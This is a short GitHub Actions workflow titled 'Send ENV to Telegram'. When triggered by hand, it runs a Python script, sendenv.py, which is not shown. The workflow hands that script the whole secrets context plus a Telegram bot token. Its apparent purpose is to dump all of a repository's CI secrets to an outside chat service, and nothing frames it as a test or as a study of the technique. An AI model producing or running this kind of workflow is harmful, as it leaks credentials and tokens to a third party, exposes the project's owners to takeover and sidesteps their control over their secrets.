name: Send ENV to Telegram
on:
  workflow_dispatch:

jobs:
  run-bot:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.10'

      - name: Install dependencies and run
        run: |
          pip install requests

      - name: Run accessing and sending script
        env:
          allsecret: ${{ secrets }}
          TGBOTTOKEN: ${{ secrets.TGBOTTOKEN }}
        run: python sendenv.py
